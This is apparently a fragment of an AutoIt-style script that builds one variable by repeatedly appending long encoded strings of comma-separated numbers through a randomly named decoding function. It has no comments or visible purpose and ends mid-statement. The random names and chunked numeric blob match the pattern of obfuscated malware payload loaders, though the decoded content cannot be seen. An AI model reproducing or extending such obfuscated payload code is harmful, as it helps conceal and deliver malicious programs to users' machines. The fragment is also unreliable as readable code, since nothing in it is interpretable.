("57,54,57,54,56,54,57,56,56,54,56,59,56,53,56,56,56,54,56,5,57,57,56,53,56,6,56,55,57,56,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,54,56,54,57,55,56,56,56,54,56,54,56,5,56,54,56,54,57,57,56,53,56,6,56,55,57,56,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,55,56,6,56,6,56,6,56,55,57,56,56,54,57,54,56,5,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,54,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,58,56,54,56,55,57,57,56,53,56,6,56,55,56,54,57,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,55,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,56,56,56,56,54,56,54,56,5,56,54,56,54,57,57,56,53,56,6,56,55,56,53,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,55,56,6,56,6,56,6,56,55,56,53,56,58,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,5,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,57,54,56,53,56,60,57,57,56,53,56,6,56,55,56,5,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,55,56,56,56,54,56,54,56,5,56,54,56,54,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,6,56,55,57,59,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,55,56,6,56,6,56,6,56,55,57,59,56,58,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,54,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,57,56,54,56,55,57,57,56,53,56,6,56,55,57,54,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,56,56,55,56,54,56,54,56,59,56,54,57,57,57,57,56,53,56,6,56,55,57,54,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,55,56,54,56,55,56,56,57,58,56,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,56,54,56,54,57,57,56,53,56,6,56,55,57,54,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,5,56,60,56,60,57,57,56,53,56,6,56,55,56,53,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,57,56,53,56,58,57,57,56,53,56,6,56,55,56,6,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,56,6,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,56,56,54,56,54,56,5,56,54,57,57,56,54,56,55,56,6,56,6,56,6,56,55,56,6,56,6,57,54,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,58,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,53,56,53,56,58,57,57,56,53,56,6,56,55,56,57,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,56,5,56,53,56,56,56,54,56,55,56,56,56,54,57,57,56,53,56,6,56,55,56,57,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,54,56,5,56,54,57,57,56,54,56,55,56,60,56,60,57,57,56,53,56,6,56,55,57,55,56,6,57,54,56,6,57,54,57,54,57,54,57,54,56,55,56,58,56,53,56,56,56,54,57,57,56,56,56,54,57,57,56,53,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,55,57,55,57,57,57,54,56,6,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,58,56,54,57,56,56,54,56,59,57,57,56,53,56,6,56,55,57,54,56,60,57,54,56,6,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,57,56,53,56,55,56,53,56,58,57,57,56,53,56,6,56,55,57,54,56,56,57,54,56,6,57,54,57,54,57,54,57,54,56,53,56,58,56,54,56,55,56,54,57,55,56,53,56,56,57,57,56,53,56,6,56,55,57,54,56,6,57,54,56,6,57,54,57,54,57,54,57,54,56,55,56,55,56,53,56,57,56,54,56,55,56,53,56,58,57,57,56,53,56,6,56,55,57,54,57,57,57,54,56,6,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,56,56,57,58,56,54,56,55,56,53,56,5,56,55,56,60,57,57,56,53,56,6,56,55,56,60,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,56,56,54,56,6,56,60,56,60,57,57,56,53,56,6,56,55,56,54,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,53,56,54,56,57,56,53,56,57,56,54,56,57,56,54,56,54,57,57,56,53,56,6,56,55,56,54,57,57,57,54,57,54,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,56,56,6,56,6,56,6,56,55,56,54,57,55,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,56,56,55,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,54,57,56,56,54,56,55,56,54,57,56,56,53,56,57,56,54,56,54,57,57,56,53,56,56,56,55,56,6,57,57,56,54,56,55,56,53,56,56,56,6,56,6,56,56,56,55,56,6,57,55,57,57,56,53,56,6,56,55,57,59,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,56,56,54,56,55,57,57,56,53,56,6,56,55,57,58,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,59,56,53,56,5,56,56,56,55,57,57,56,53,56,6,56,55,57,58,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,6,56,54,56,55,56,54,56,57,56,53,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,57,56,53,56,6,56,55,57,58,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,5,56,54,57,54,56,54,57,55,56,6,56,6,56,6,56,55,57,58,57,57,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,56,56,55,56,6,56,60,56,53,56,53,56,54,56,57,56,53,56,57,56,54,57,57,56,54,56,54,57,57,56,53,56,56,56,55,56,6,56,56,56,54,56,55,56,54,57,55,56,6,56,6,56,56,56,55,56,6,56,54,57,57,56,53,56,6,56,55,56,5,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,57,56,53,56,58,57,57,56,53,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,55,56,5,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,57,59,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,56,56,54,56,6,56,53,56,58,56,54,56,55,57,57,56,53,56,6,56,55,57,59,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,56,56,56,56,55,56,53,56,6,56,6,56,6,56,6,56,55,57,59,56,6,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,6,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,57,56,54,57,54,57,57,56,53,56,6,56,55,56,5,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,55,56,53,56,56,56,54,56,5,56,54,57,55,56,54,56,54,57,57,56,53,56,6,56,55,56,5,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,55,56,54,56,55,56,6,56,6,56,6,56,55,56,5,56,54,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,6,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,58,56,53,56,56,56,54,57,57,56,56,56,57,57,57,56,53,56,6,56,55,56,6,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("58,56,54,56,55,56,54,56,59,56,53,56,56,57,57,56,53,56,6,56,55,56,6,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,55,56,55,56,53,56,57,56,54,56,55,57,57,56,53,56,6,56,55,56,6,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,58,56,55,56,56,56,54,56,6,56,53,56,58,57,57,56,53,56,6,56,55,56,5,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,54,56,56,56,60,56,60,57,57,56,53,56,6,56,55,56,56,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,57,54,56,53,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,57,56,53,56,6,56,55,56,56,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,55,56,55,56,60,56,53,56,58,57,57,56,53,56,6,56,55,56,55,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,57,56,54,56,55,56,53,56,57,57,57,56,53,56,6,56,55,56,55,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,57,56,55,56,56,56,54,57,54,56,54,57,58,56,54,56,54,57,57,56,53,56,6,56,55,56,55,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,55,56,6,56,6,56,6,56,55,56,55,57,59,57,54,57,58,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,59,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,59,56,54,56,56,57,57,56,53,56,6,56,55,57,59,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,59,56,53,56,55,56,53,56,57,56,53,56,56,57,57,56,53,56,6,56,55,57,58,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,56,53,56,58,56,54,56,5,56,53,56,54,57,57,56,53,56,6,56,55,57,58,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,5,56,54,57,57,56,54,56,55,56,54,56,53,57,57,56,53,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,57,58,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,57,56,55,56,56,56,54,57,54,57,57,56,53,56,6,56,55,57,58,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,58,56,54,56,55,56,54,57,55,56,60,56,60,57,57,56,53,56,6,56,55,56,60,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,58,56,53,56,56,56,54,57,57,56,56,56,57,57,57,56,53,56,6,56,55,56,60,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,58,56,54,56,55,56,54,56,59,56,53,56,56,57,57,56,53,56,6,56,55,56,60,57,57,57,54,56,5,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,56,54,56,55,56,55,56,60,56,53,56,58,56,54,57,54,57,57,56,53,56,6,56,55,56,59,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,57,56,54,56,55,56,53,56,57,56,53,56,57,57,57,56,53,56,6,56,55,56,59,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,56,54,56,59,56,53,56,58,56,54,56,59,57,57,56,53,56,6,56,55,56,59,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,56,56,54,56,55,56,53,56,56,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,59,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,58" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,57,56,6,56,6,56,6,56,55,56,59,57,55,57,54,56,5,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,57,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,58,56,53,56,56,56,54,57,57,56,56,56,57,57,57,56,53,56,6,56,55,56,57,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,58,56,54,56,55,56,54,56,59,56,53,56,56,57,57,56,53,56,6,56,55,56,56,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,55,56,55,56,53,56,57,56,54,56,55,57,57,56,53,56,6,56,55,56,56,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,58,56,55,56,60,56,53,56,58,56,54,57,54,57,57,56,53,56,6,56,55,56,56,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,57,56,54,56,55,56,53,56,57,56,53,56,57,56,6,56,6,56,6,56,55,56,56,57,57,57,54,57,59,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,55,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,55,57,59,56,53,56,53,56,56,56,57,56,53,56,58,57,57,56,53,56,6,56,55,57,55,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,57,55,57,57,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,59,57,54,57,54,57,54,57,54,56,55,56,56,56,53,56,58,56,54,56,59,56,54,57,55,57,57,56,53,56,6,56,55,57,54,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,57,56,54,56,59,56,54,56,57,56,53,56,56,57,57,56,53,56,6,56,55,57,54,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,5,56,54,57,54,56,54,57,55,56,60,56,60,57,57,56,53,56,6,56,55,57,57,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,57,54,56,53,56,60,57,57,56,53,56,6,56,55,57,57,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,56,54,57,55,56,55,56,57,56,54,56,55,57,57,56,53,56,6,56,55,57,57,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,57,56,53,56,56,56,54,56,5,56,54,57,54,56,54,56,54,57,57,56,53,56,6,56,55,57,57,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,55,56,60,56,60,57,57,56,53,56,6,56,55,56,53,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,58,56,53,56,56,56,54,57,57,56,55,56,57,57,57,56,53,56,6,56,55,56,53,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,56,56,56,56,57,56,53,56,55,57,57,56,53" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,6,56,55,56,53,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,58,56,53,56,58,56,54,56,55,56,54,57,55,57,57,56,53,56,6,56,55,56,6,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,56,56,55,56,56,56,53,56,58,56,54,56,59,57,57,56,53,56,6,56,55,56,6,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,55,56,53,56,57,56,54,56,59,56,54,56,57,57,57,56,53,56,6,56,55,56,6,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,5,56,54,57,54,56,54,57,55,56,6,56,6,56,6,56,55,56,6,57,57,57,54,56,5,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,60,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,57,59,56,53,56,53,56,55,56,58,56,54,57,54,57,57,56,53,56,6,56,55,56,60,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,57,56,54,57,57,56,54,56,58,56,54,56,59,57,57,56,53,56,6,56,55,56,59,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,57,56,54,57,58,56,55,56,56,56,53,56,58,57,57,56,53,56,6,56,55,56,59,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,59,56,54,57,55,56,53,56,57,56,54,56,59,57,57,56,53,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,59,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,57,56,53,56,56,56,54,56,5,56,54,57,54,56,54,56,54,57,57,56,53,56,6,56,55,56,59,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,55,56,60,56,60,57,57,56,53,56,6,56,55,57,54,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,57,56,54,56,56,56,53,56,58,56,56,56,53,57,57,56,53,56,6,56,55,57,54,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,56,56,55,56,60,56,53,56,58,57,57,56,53,56,6,56,55,57,54,56,6,57,54,56,5,57,54,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,54,57,54,56,54,56,57,56,54,56,55,56,54,56,56,57,57,56,53,56,6,56,55,57,54,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,55,56,53,56,58,56,54,56,55,56,56,56,59,57,57,56,53,56,6,56,55,56,60,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,56,56,54,56,56,56,53,56,58,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,60,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,57,56,53,56,57,56,6,56,6,56,6,56,55,56,60,56,54,57,54,57,59,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,58,56,60,57,54,57,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,57,54,56,56,57,57,56,54,56,56,56,53,56,58,56,56,57,57,57,57,56,53,56,6,56,55,57,58,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,59,56,54,56,56,56,56,56,56,56,54,56,54,57,57,56,53,56,6,56,55,57,58,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,57,57,56,6,56,6,56,6,56,55,57,58,57,59,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,53,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,53,56,54,56,57,56,53,56,57,56,54,56,57,56,54,56,54,57,57,56,53,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,55,56,53,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,54,57,56,56,53,56,60,56,6,56,6,56,6,56,55,56,53,56,54,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,54,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,56,57,56,56,54,56,55,56,53,56,57,56,53,56,57,57,57,56,53,56,6,56,55,57,54,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,53,56,54,56,55,56,56,56,58,57,57,56,53,56,6,56,55,57,54,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,6,56,56,56,59,56,60,56,60,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,6,56,55,56,55,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,56,56,5,56,53,56,57,56,55,56,53,56,54,57,54,57,57,56,53,56,6,56,55,56,55,57,57,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,53,56,57,56,54,56,57,56,56,56,55,56,60,57,57,56,53,56,6,56,55,56,54,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,58,56,54,57,54,56,54,56,57,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,54,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,57,56,53,56,57,56,6,56,6,56,6,56,55,56,54,56,54,57,54,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,57,56,53,56,6,56,55,56,5,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,54,56,53,56,58,57,57,56,53,56,6,56,55,56,5,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,55,56,55,56,54,56,54,56,5,57,57,56,53,56,6,56,55,56,5,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,58,56,53,56,56,56,53,56,55,56,54,56,59,57,57,56,53,56,6,56,55,57,59,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,57,56,56,57,56,56,54,56,55,56,54,57,56,57,57,56,53,56,6,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,59,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,58,56,53,56,5,56,60,56,60,57,57,56,53,56,6,56,55,56,56,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,57,56,54,57,57,57,57,56,53,56,6,56,55,56,56,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,57,56,54,56,55,56,60,56,60,57,57,56,53,56,6,56,55,56,53,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,53,56,54,56,57,56,53,56,57,56,54,56,57,56,54,56,54,57,57,56,53,56,6,56,55,56,53,57,57,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,54,56,53,56,60,56,53,56,5,56,6,56,6,56,6,56,55,56,53,57,55,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,58,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,57,56,53,56,58,57,57,56,53,56,6,56,55,57,57,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,57,57,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,55,56,53,56,57,56,54,56,55,56,53,56,58,57,57,56,53,56,6,56,55,57,57,56,6,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,59,57,54,57,54,57,54,57,54,56,55,56,60,56,53,56,58,56,54,57,54,56,54,56,57,57,57,56,53,56,6,56,55,57,57,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,57,56,53,56,57,56,60,56,60,57,57,56,53,56,6,56,55,56,59,57,57,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,53,56,54,56,57,56,53,56,57,56,53,56,56,57,57,56,53,56,6,56,55,56,58,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,54,57,54,56,54,57,56,56,54,56,58,56,53,56,57,56,6,56,6,56,6,56,55,56,58,56,56,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,6,56,55,56,5,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,59,56,53,56,55,57,57,56,53,56,6,56,55,56,5,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,53,56,5,56,55,56,57,57,57,56,53,56,6,56,55,56,5,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,57,56,53,56,56,56,54,56,5,56,54,56,54,57,57,56,53,56,6,56,55,56,5,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,54,56,54,57,55,56,6,56,6,56,6,56,55,56,5,57,55,57,54,57,57,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,57,56,53,56,6,56,55,57,58,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,57,56,54,56,6,56,54,57,54,56,53,56,53,57,57,56,53,56,6,56,55,57,57,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,53,56,54,56,5,56,54,57,55,56,54,56,56,56,54,56,54,57,57,56,53,56,6,56,55,57,57,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,53,56,6,56,6,56,6,56,55,57,57,56,54,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,54,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,56,56,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,58,56,54,56,55,56,54,56,59,57,57,56,53,56,6,56,55,57,54,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,55,56,53,56,54,56,5,57,57,56,53,56,6,56,55,57,54,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,54,57,55,56,54,56,56,56,54,57,54,56,53,56,53,57,57,56,53,56,6,56,55,57,54,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,56,55,56,53,56,6,56,55,56,53,56,60,56,60,57,57,56,53,56,6,56,55,57,59,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,58,56,54,56,55,56,54,56,53,56,54,56,5,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,6,56,55,57,59,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,57,56,53,56,56,56,54,56,55,56,53,56,58,57,57,56,53,56,6,56,55,57,59,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,57,56,54,57,57,56,54,56,59,56,53,56,57,56,54,56,54,57,57,56,53,56,6,56,55,57,59,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,57,56,55,56,53,56,6,56,6,56,6,56,55,57,59,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,6,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,56,56,54,56,55,56,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,55,56,53,57,57,56,53,56,6,56,55,56,6,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,5,56,54,57,55,56,54,56,56,56,54,57,54,57,57,56,53,56,6,56,55,56,6,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,53,56,55,56,60,56,53,56,58,56,54,57,54,56,54,56,54,57,57,56,53,56,6,56,55,56,6,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,57,56,55,56,53,56,6,56,6,56,6,56,55,56,6,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,56,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,54,57,54,56,53,56,57,56,53,56,56,57,57,56,53,56,6,56,55,57,56,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,59,56,53,56,55,56,54,56,5,56,53,56,56,57,57,56,53,56,6,56,55,57,56,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,56,56,54,56,55,56,53,56,57,56,53,56,57,57,57,56,53,56,6,56,55,57,56,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,53,56,54,56,55,56,60,56,60,57,57,56,53,56,6,56,55,56,57,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,56,56,55,56,54,57,55,56,54,56,56,56,55,56,60,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,53,56,6,56,55,56,57,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,5,56,54,57,55,56,53,56,56,56,6,56,6,56,6,56,55,56,57,57,57,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,59,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,56,56,54,56,54,56,5,56,54,57,57,56,54,57,57,57,57,56,53,56,6,56,55,56,59,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,58,56,54,56,55,56,54,56,57,56,53,56,56,56,6,56,6,56,6,56,55,56,59,56,6,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,57,59,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,56,56,58,56,54,56,55,56,54,56,53,56,54,56,5,57,57,56,53,56,6,56,55,57,59,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,55,56,55,56,60,56,54,56,59,56,54,56,5,56,54,56,54,57,57,56,53,56,6,56,55,57,59,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,55,56,53,56,56,56,6,56,6,56,6,56,55,57,59,57,55,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,58,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,57,56,54,57,54,56,56,56,5,56,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,57,57,56,53,56,6,56,55,57,58,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,5,56,53,56,56,56,54,56,5,56,54,56,59,57,57,56,53,56,6,56,55,57,58,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,5,56,53,57,59,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,57,58,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,55,56,53,56,6,56,6,56,6,56,6,56,55,57,58,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,6,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,56,56,57,56,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA 